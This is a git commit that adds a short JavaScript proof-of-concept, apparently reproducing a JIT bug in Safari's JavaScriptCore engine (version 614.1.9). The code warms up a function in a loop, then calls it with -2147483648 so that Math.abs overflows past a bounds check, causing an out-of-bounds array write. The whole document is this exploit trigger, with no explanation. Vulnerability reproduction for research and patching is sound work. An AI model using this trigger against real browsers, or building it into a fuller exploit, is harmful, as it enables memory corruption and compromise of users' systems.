PoC Reproduction in version Safari-614.1.9

2022-12-14 12:29:48 +08:00
commit f6094610c5
3 changed files with 184 additions and 0 deletions
--- a/Safari-614.1.9/PoC/PoC.js
+++ b/Safari-614.1.9/PoC/PoC.js
@@ -0,0 +1,15 @@
+function f(arr, n) {
+    n &= 0xffffffff;
+    if (n < -1) {
+        let v = (-n)&0xffffffff;
+        let i = Math.abs(n);
+        if (i < arr.length) {
+            return arr[i] = 1000;
+        }
+    }
+}
+let arr= new Array(10);
+for (let i = 0; i < 50000; i++) {
+    f(arr, -3);
+}
+f(arr, -2147483648);